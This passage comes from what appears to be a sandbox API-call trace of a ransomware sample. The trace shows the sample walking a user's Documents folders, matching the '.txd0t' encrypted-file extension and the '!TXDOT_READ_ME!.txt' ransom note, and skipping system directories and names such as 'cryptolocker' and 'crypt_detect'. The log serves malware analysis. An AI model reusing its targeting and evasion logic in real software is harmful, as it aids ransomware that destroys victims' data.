(psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.452] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.452] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0119.452] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0119.452] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\!TXDOT_READ_ME!.txt" [0119.452] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.452] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.453] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.453] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f62f110, ftCreationTime.dwHighDateTime=0x1d5e689, ftLastAccessTime.dwLowDateTime=0xee412150, ftLastAccessTime.dwHighDateTime=0x1d5e475, ftLastWriteTime.dwLowDateTime=0x518e615d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x163c1, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="2o _xfnucm3wfE92We.ods.txd0t", cAlternateFileName="2O_XFN~1.TXD")) returned 1 [0119.453] StrCmpW (psz1="2o _xfnucm3wfE92We.ods.txd0t", psz2=".") returned 1 [0119.453] StrCmpW (psz1="2o _xfnucm3wfE92We.ods.txd0t", psz2="..") returned 1 [0119.453] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0119.453] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0119.453] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="2o _xfnucm3wfE92We.ods.txd0t", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods.txd0t" [0119.453] PathFindExtensionW (pszPath="2o _xfnucm3wfE92We.ods.txd0t") returned=".txd0t" [0119.453] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.453] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48075b0, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xa970ba70, ftLastAccessTime.dwHighDateTime=0x1d5e19d, ftLastWriteTime.dwLowDateTime=0x5190c39f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17872, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="cpdJYzaQxXso.odt.txd0t", cAlternateFileName="CPDJYZ~1.TXD")) returned 1 [0119.453] StrCmpW (psz1="cpdJYzaQxXso.odt.txd0t", psz2=".") returned 1 [0119.453] StrCmpW (psz1="cpdJYzaQxXso.odt.txd0t", psz2="..") returned 1 [0119.453] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0119.453] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0119.453] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="cpdJYzaQxXso.odt.txd0t", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt.txd0t" [0119.453] PathFindExtensionW (pszPath="cpdJYzaQxXso.odt.txd0t") returned=".txd0t" [0119.453] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.453] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e69320, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0xa1e87b90, ftLastAccessTime.dwHighDateTime=0x1d5ec0f, ftLastWriteTime.dwLowDateTime=0x5193586a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xc1fa, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="ivPZqJfxmHT.pps.txd0t", cAlternateFileName="IVPZQJ~1.TXD")) returned 1 [0119.453] StrCmpW (psz1="ivPZqJfxmHT.pps.txd0t", psz2=".") returned 1 [0119.453] StrCmpW (psz1="ivPZqJfxmHT.pps.txd0t", psz2="..") returned 1 [0119.453] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0119.453] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0119.454] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="ivPZqJfxmHT.pps.txd0t", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps.txd0t" [0119.454] PathFindExtensionW (pszPath="ivPZqJfxmHT.pps.txd0t") returned=".txd0t" [0119.454] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.454] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f46f3c0, ftCreationTime.dwHighDateTime=0x1d5ea50, ftLastAccessTime.dwLowDateTime=0x521649ca, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="jDtkUz0kU8", cAlternateFileName="JDTKUZ~1")) returned 1 [0119.454] StrCmpW (psz1="jDtkUz0kU8", psz2=".") returned 1 [0119.454] StrCmpW (psz1="jDtkUz0kU8", psz2="..") returned 1 [0119.454] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0119.454] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0119.454] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="jDtkUz0kU8", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\system32\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\system\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\appdata\\local\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\boot\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\perflogs\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\programdata\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\drivers\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\wsus\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="crypt_detect") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="cryptolocker") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="ransomware") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="C:\\WINDOWS") returned 0x0 [0119.454] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.455] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="C:\\Program Files") returned 0x0 [0119.455] GetProcessHeap () returned 0xe30000 [0119.455] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4e4) returned 0xed90d0 [0119.455] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0119.455] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\*", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\*" [0119.455] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\*", lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f46f3c0, ftCreationTime.dwHighDateTime=0x1d5ea50, ftLastAccessTime.dwLowDateTime=0x521649ca, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec18b0 [0119.455] StrCmpW (psz1=".", psz2=".") returned 0 [0119.455] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f46f3c0, ftCreationTime.dwHighDateTime=0x1d5ea50, ftLastAccessTime.dwLowDateTime=0x521649ca, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.455] StrCmpW (psz1="..", psz2=".") returned 1 [0119.455] StrCmpW (psz1="..", psz2="..") returned 0 [0119.455] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x519589ba, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x519589ba, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519589ba, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.455] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.455] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.455] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0119.455] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0119.455] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\!TXDOT_READ_ME!.txt" [0119.455] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.455] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.455] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.455] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.455] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.455] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.455] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.455] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.455] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.455] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.455] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.455] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.455] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.455] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.456] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.456] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.456] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd4b9150, ftCreationTime.dwHighDateTime=0x1d5e525, ftLastAccessTime.dwLowDateTime=0xea2cfea0, ftLastAccessTime.dwHighDateTime=0x1d5eb86, ftLastWriteTime.dwLowDateTime=0x519589ba, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18385, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="8GgGCWAXxjKLpeoA40OY.odp.txd0t", cAlternateFileName="8GGGCW~1.TXD")) returned 1 [0119.456] StrCmpW (psz1="8GgGCWAXxjKLpeoA40OY.odp.txd0t", psz2=".") returned 1 [0119.456] StrCmpW (psz1="8GgGCWAXxjKLpeoA40OY.odp.txd0t", psz2="..") returned 1 [0119.456] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0119.456] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0119.456] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="8GgGCWAXxjKLpeoA40OY.odp.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp.txd0t" [0119.456] PathFindExtensionW (pszPath="8GgGCWAXxjKLpeoA40OY.odp.txd0t") returned=".txd0t" [0119.456] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.456] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbbf0b10, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0xe1aa4ee0, ftLastAccessTime.dwHighDateTime=0x1d5e1db, ftLastWriteTime.dwLowDateTime=0x51f4e844, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x80cf, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="hnSSITWu7H4.odt.txd0t", cAlternateFileName="HNSSIT~1.TXD")) returned 1 [0119.456] StrCmpW (psz1="hnSSITWu7H4.odt.txd0t", psz2=".") returned 1 [0119.456] StrCmpW (psz1="hnSSITWu7H4.odt.txd0t", psz2="..") returned 1 [0119.456] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0119.456] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0119.456] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="hnSSITWu7H4.odt.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt.txd0t" [0119.456] PathFindExtensionW (pszPath="hnSSITWu7H4.odt.txd0t") returned=".txd0t" [0119.456] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.456] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43a94a60, ftCreationTime.dwHighDateTime=0x1d5ed12, ftLastAccessTime.dwLowDateTime=0x464da5e0, ftLastAccessTime.dwHighDateTime=0x1d5e600, ftLastWriteTime.dwLowDateTime=0x5197eacc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4b8c, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="j7-b.pdf.txd0t", cAlternateFileName="J7-BPD~1.TXD")) returned 1 [0119.456] StrCmpW (psz1="j7-b.pdf.txd0t", psz2=".") returned 1 [0119.456] StrCmpW (psz1="j7-b.pdf.txd0t", psz2="..") returned 1 [0119.456] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0119.456] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0119.456] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="j7-b.pdf.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf.txd0t" [0119.456] PathFindExtensionW (pszPath="j7-b.pdf.txd0t") returned=".txd0t" [0119.456] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.456] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcadeab70, ftCreationTime.dwHighDateTime=0x1d5e9c4, ftLastAccessTime.dwLowDateTime=0xa568d710, ftLastAccessTime.dwHighDateTime=0x1d5ebbf, ftLastWriteTime.dwLowDateTime=0x5197eacc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x74c4, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="LFpWuQJ-aF.doc.txd0t", cAlternateFileName="LFPWUQ~1.TXD")) returned 1 [0119.456] StrCmpW (psz1="LFpWuQJ-aF.doc.txd0t", psz2=".") returned 1 [0119.456] StrCmpW (psz1="LFpWuQJ-aF.doc.txd0t", psz2="..") returned 1 [0119.456] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0119.456] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") 